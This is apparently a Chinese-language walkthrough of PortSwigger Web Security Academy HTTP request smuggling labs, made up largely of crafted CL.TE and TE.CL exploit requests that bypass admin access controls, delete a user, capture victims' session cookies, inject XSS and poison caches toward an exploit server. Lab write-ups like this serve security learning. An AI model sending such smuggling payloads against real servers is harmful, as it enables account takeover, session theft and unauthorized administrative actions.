目录
建议配合浅谈HTTP请求走私食用
题目描述
Tranfer-Encoding
GET POST
之外的请求方式要求
GPOST
请求解题过程
构造请求
当 Content-Length
和 Transfer-Encoding
同时出现时,Content-Length
会被忽略。
Content-Length
计算时,要把\r\n
计算在内(2字节),且首行的\r\n
不计算
POST / HTTP/1.1
Host: ac521fe01ea7d406808f07ec00ae0019.web-security-academy.net
Connection: close
Content-Length: 6
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked
0
G
前端服务器正常处理,但发送到后端服务器时,会产生两个请求:
POST / HTTP/1.1
Host: ac521fe01ea7d406808f07ec00ae0019.web-security-academy.net
Connection: close
Content-Length: 6
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked
0
和
G
只需要再用POST访问一次,即可拼接成
GPOST / HTTP/1.1
Host: ac521fe01ea7d406808f07ec00ae0019.web-security-academy.net
Connection: close
Content-Length: 6
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked
0
题目描述
Transfer-Encoding
GET POST
之外的所有请求方式要求
GPOST
请求解题过程
需要关闭Burp Suite
中的Update COntent-Length
选项
构造请求
需要注意,chunked
下,需要在每个chunk
前用十六进制表示该chunk
的大小(不算表示块终的\r\n
)
POST / HTTP/1.1
Host: acfd1f981fff47c180bb187600d00030.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-length: 4
Transfer-Encoding: chunked
57
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 10
0
题目描述
GET POST
之外的请求方式要求
GPOST
请求解题过程
示例试了好多都不行,看了solution,要多加一个Transfer-encoding: xxx
。。。发现审题审错了
POST / HTTP/1.1
Host: ac121fa21f537ddc80cc62410043006a.web-security-academy.net
Connection: close
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked
Transfer-encoding: x
Content-Length: 4
57
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 10
0
题目描述
Transfer-Encoding
要求
/
的请求返回404
解题过程
构造一个访问404页面的请求走私就好了
POST / HTTP/1.1
Host: ac941f561fb1305680d6062e0058002c.web-security-academy.net
Connection: close
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked
Content-Length: 79
0
GET /404 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X: x
题目描述
Transfer-Encoding
要求
/
的请求返回404
解题过程
和上一题类似,换成TE.CL就好了
POST / HTTP/1.1
Host: ac481f211e557bc680d30660008a00f3.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-length: 4
Transfer-Encoding: chunked
58
GET /404 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
0
题目描述
Transfer-Encoding
/admin
,但前端服务器禁止访问该页面要求
/admin
并删除carlos
的账号(这出题人指定跟carlos
过不去)解题过程
和上面的思路一样,走私一个访问/admin
的请求
POST / HTTP/1.1
Host: ac2a1f221e94836b8057a22200d40099.web-security-academy.net
Connection: close
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked
Content-Length: 79
0
GET /admin HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X: x
提示Admin interface only available to local users
,添加一个伪造IP的请求头(把知道的都试了一遍都不行,看了solution需要用host
POST / HTTP/1.1
Host: ac2a1f221e94836b8057a22200d40099.web-security-academy.net
Connection: close
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked
Content-Length: 79
0
POST /admin HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
xxx&
紧跟着的请求
GET / HTTP/1.1
Host: ac2a1f221e94836b8057a22200d40099.web-security-academy.net
然后按照上面的方法,构造一个删除carlos
账号的请求就好了
最终的exp === /admin
换成/admin/delete?username=carlos
题目描述
Transfer-Encoding
/admin
,但前端服务器禁止访问该页面要求
/admin
并删除carlos
的账号解题过程
换汤不换药,上一题的方法改成TE.CL就行
exp
POST / HTTP/1.1
Host: ac7a1fa81ef16a3a800c23a400de003c.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-length: 4
Transfer-Encoding: chunked
83
POST /admin/delete?username=carlos HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
0
GET / HTTP/1.1
Host: ac7a1fa81ef16a3a800c23a400de003c.web-security-academy.net
题目描述
Transfer-Encoding
--> CL.TE/admin
,但只有ip==127.0.0.1
的用户才能访问要求
carlos
的账号解题过程
材料给了提示,先找找会返回输入的 (POST) 功能点 --> 搜索
先构造个简单的,看看前端服务器添加了些啥
POST / HTTP/1.1
Host: ac611f541e199c3880625911008c0059.web-security-academy.net
Connection: close
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked
Content-Length: 101
0
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 222
search=
连发两边,获得请求包:
POST / HTTP/1.1
X-qFYlCI-Ip: 13.127.209.47
Host: ac611f541e199c3880625911008c0059.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked
Content-Length: 101
0
设置IP的请求头X-qFYlCI-Ip
构造exp
POST / HTTP/1.1
Host: ac611f541e199c3880625911008c0059.web-security-academy.net
Connection: close
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked
Content-Length: 144
0
POST /admin/delete?username=carlos HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-qFYlCI-Ip: 127.0.0.1
Content-Length: 0
题目描述
Transfer-Encoding
--> CL.TE要求
解题过程
需要寻找一个可以返回/保存信息的功能点 --> 评论 ,而且csrf token不会失效
构造exp
POST / HTTP/1.1
Host: ace91f721e814bba80f528c000a600f8.web-security-academy.net
Connection: close
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked
Cookie: victim-fingerprint=w09BWrZPFqVXkVgkVvuEboC4NdVpeGTW; secret=EOQzcrm5jNsBBUO2hWKEOl0WWzwl1bjs;
Content-Length: 291
0
POST /post/comment HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: session=jQaZVDTI26LnAcK6YSDCWY2yDIgJWXqa
Content-Length: 764
csrf=U65lnzldkL6JqoUw6XYEEAXmaK4RhXbF&postId=5&name=asd&email=test%40test.com&website=https%3A%2F%2Fasd%27%27%27%27&comment=aaaaaaaaaaa
测了老半天,受害者差不多2分钟左右访问一次,然后这个长度也是。。。经常读到小半截cookie
题目描述
Transfer-Encoding
--> CL.TE要求
alert(1)
解题过程
先找xss功能点
在评论框里会加载uA
构造exp
POST / HTTP/1.1
Host: ac621f9e1edd0ed4807e5a3c00f9004a.web-security-academy.net
Connection: close
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked
Content-Length: 136
0
GET /post?postId=7 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: asd"><svg/onload=alert(1)><
Padding: xxx
题目描述
Transfer-Encoding
--> CL.TE要求
通过缓存投毒,把JS源重定向到exploit server,执行alert(document.cookie)
解题过程
需要构造两个请求,并且设置exploit server
第一个是HTTP请求走私,使下一个访问js资源的请求重定向到exploit server
exploit server
的请求需要让后端服务器正常处理,也就是说这里的跳转必须符合后端服务器的正常路由第二个是正常的访问js资源,使前端服务器更新缓存
很人性化,exploit server
已经设置好了(Content-Type: application/javascript
)如果CT不对的话,是不会执行的,在body填上alert(document.cookie);
就行
构造exp(/post/next
必须使用GET
方法,其他方法会返回404
)
POST / HTTP/1.1
Host: acb81f971f48e35c80610c45008d0058.web-security-academy.net
Connection: close
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked
Content-Length: 186
0
GET /post/next?postId=3 HTTP/1.1
Host: acd41f671fb3e37980dd0c0a01580001.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 20
padding=xxx
然后浏览器访问/resources/js/tracking.js
即可
题目描述
Transfer-Encoding
--> CL.TE要求
API key
并提交解题过程
直接构造exp,要去掉无用的请求头,避免出现dumplicate
错误,看了网页源码,我猜受害者会请求tracking.js
POST / HTTP/1.1
Host: acef1f451e05881080b6051300a50062.web-security-academy.net
Connection: close
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked
Content-Length: 186
0
GET /my-account HTTP/1.1
Padding: x
获取了半天获取不到,看了下solution,思路没错,但是获取方式有点奇怪?要一直发,然后再要用无痕浏览器强制打开看???
我猜是避免用自己的cookie进行缓存欺骗
手机扫一扫
移动阅读更方便
你可能感兴趣的文章